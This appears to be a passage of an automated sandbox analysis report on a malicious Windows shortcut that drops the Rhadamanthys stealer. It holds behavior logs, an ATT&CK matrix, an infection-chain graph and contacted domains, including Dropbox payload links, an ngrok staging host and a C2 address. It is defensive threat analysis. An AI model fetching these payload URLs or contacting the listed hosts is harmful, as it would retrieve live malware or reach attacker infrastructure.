                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041C260 GetSystemTimeAsFileTime,SHFormatDateTimeW,26_2_0041C260
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041A06D GetVersion,EnumWindows,IsWindow,SetForegroundWindow,SendMessageW,SendMessageW,SendMessageW,InitCommonControlsEx,CreateSolidBrush,EnumWindows,IsWindow,SetForegroundWindow,EnumWindows,IsWindow,SendMessageW,29_2_0041A06D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2337633012.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2470897649.0000000003580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2337633012.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2470897649.0000000003580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		Valid Accounts11
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		21
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Access Token Manipulation                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory2
                      File and Directory Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts12
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Windows Service                      		3
                      Obfuscated Files or Information                      		Security Account Manager136
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		11
                      Registry Run Keys / Startup Folder                      		211
                      Process Injection                      		1
                      Software Packing                      		NTDS341
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture4
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell                      		Network Logon Script11
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		LSA Secrets11
                      Process Discovery                      		SSHKeylogging15
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading                      		Cached Domain Credentials41
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                      Virtualization/Sandbox Evasion                      		DCSync11
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572663 Sample: 751ietQPnX.lnk Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 91 uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com 2->91 93 uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com 2->93 95 7 other IPs or domains 2->95 111 Suricata IDS alerts for network traffic 2->111 113 Windows shortcut file (LNK) starts blacklisted processes 2->113 115 Multi AV Scanner detection for submitted file 2->115 117 7 other signatures 2->117 14 cmd.exe 1 2->14         started        17 msedge.exe 115 546 2->17         started        20 svchost.exe 1 2 2->20         started        22 2 other processes 2->22 signatures3 process4 dnsIp5 137 Windows shortcut file (LNK) starts blacklisted processes 14->137 139 Suspicious powershell command line found 14->139 141 PowerShell case anomaly found 14->141 24 powershell.exe 14 28 14->24         started        29 conhost.exe 1 14->29         started        81 192.168.2.4, 138, 443, 49266 unknown unknown 17->81 83 192.168.2.14 unknown unknown 17->83 87 2 other IPs or domains 17->87 143 Creates multiple autostart registry keys 17->143 145 Maps a DLL or memory area into another process 17->145 31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 msedge.exe 17->35         started        41 5 other processes 17->41 85 127.0.0.1 unknown unknown 20->85 37 msedge.exe 22->37         started        39 msedge.exe 22->39         started        signatures6 process7 dnsIp8 97 162.125.65.15, 443, 49736 DROPBOXUS United States 24->97 99 edge-block-www-env.dropbox-dns.com 162.125.69.15, 443, 49733, 49749 DROPBOXUS United States 24->99 105 2 other IPs or domains 24->105 79 C:\Users\user\AppData\...\1462386273.bat, DOS 24->79 dropped 127 Windows shortcut file (LNK) starts blacklisted processes 24->127 129 Loading BitLocker PowerShell Module 24->129 131 Powershell drops PE file 24->131 43 cmd.exe 24->43         started        46 msedge.exe 16 24->46         started        101 uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com 31->101 103 204.79.197.237, 443, 61992 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->103 107 8 other IPs or domains 31->107 file9 signatures10 process11 signatures12 133 Windows shortcut file (LNK) starts blacklisted processes 43->133 135 Suspicious powershell command line found 43->135 48 powershell.exe 43->48         started        51 conhost.exe 43->51         started        53 msedge.exe 46->53         started        process13 file14 75 C:\Users\user\AppData\Local\...\854113748.exe, PE32 48->75 dropped 55 854113748.exe 48->55         started        59 msedge.exe 48->59         started        process15 file16 77 C:\Users\user\...\PerfectouinVans.exe, PE32 55->77 dropped 119 Multi AV Scanner detection for dropped file 55->119 121 Detected unpacking (creates a PE file in dynamic memory) 55->121 123 Drops PE files to the document folder of the user 55->123 125 5 other signatures 55->125 61 854113748.exe 55->61         started        63 msedge.exe 59->63         started        signatures17 process18 process19 65 fontdrvhost.exe 61->65         started        69 WerFault.exe 61->69         started        dnsIp20 89 162.213.210.250, 49834, 6499 IOFLOODUS United States 65->89 109 Switches to a custom stack to bypass stack traces 65->109 71 fontdrvhost.exe 65->71         started        signatures21 process22 process23 73 WerFault.exe 71->73         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      751ietQPnX.lnk18%ReversingLabsWin32.Trojan.Pantera
                      751ietQPnX.lnk100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\854113748.exe26%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65ge0%Avira URL Cloudsafe
                      https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=10%Avira URL Cloudsafe
                      https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=10%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d0%Avira URL Cloudsafe
                      https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=10%Avira URL Cloudsafe
                      http://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app0%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.0%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7-UseBa0%Avira URL Cloudsafe
                      http://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      http://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gekernelbasentdllkernel32GetProces0%Avira URL Cloudsafe
                      https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw0%Avira URL Cloudsafe
                      http://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/LogoutYxAB0%Avira URL Cloudsafe
                      https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY0%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f70%Avira URL Cloudsafe
                      http://www.microsoft.coS0%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app0%Avira URL Cloudsafe
                      https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=10%Avira URL Cloudsafe
                      https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4n0%Avira URL Cloudsafe
                      https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com/cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mz0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fg.microsoft.map.fastly.net
                      		199.232.210.172
                      		truefalse
                        		high
                        7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                        		18.192.31.165
                        		truefalse
                          		high
                          chrome.cloudflare-dns.com
                          		162.159.61.3
                          		truefalse
                            		high
                            edge-block-www-env.dropbox-dns.com
                            		162.125.69.15
                            		truefalse
                              		high
                              www-env.dropbox-dns.com
                              		162.125.69.18
                              		truefalse
                                		high
                                s-part-0035.t-0009.t-msedge.net
                                		13.107.246.63
                                		truefalse
                                  		high
                                  googlehosted.l.googleusercontent.com
                                  		142.250.181.65
                                  		truefalse
                                    		high
                                    uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      clients2.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        bzib.nelreports.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.dropbox.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1false
                                                      		high
                                                      https://www.dropbox.com/scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1false
                                                        		high
                                                        https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                                          		high
                                                          https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1false
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17dpowershell.exe, 00000010.00000002.2278426840.000002336DB44000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.dropbox.compowershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gefontdrvhost.exefalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7-UseBapowershell.exe, 00000002.00000002.2090725015.0000012D32300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022533869.0000012D18390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022533869.0000012D18397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023075082.0000012D18550000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.1915561956.000001BA25AB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25B17000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25AF8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25B04000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://app.hellosign.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.compowershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
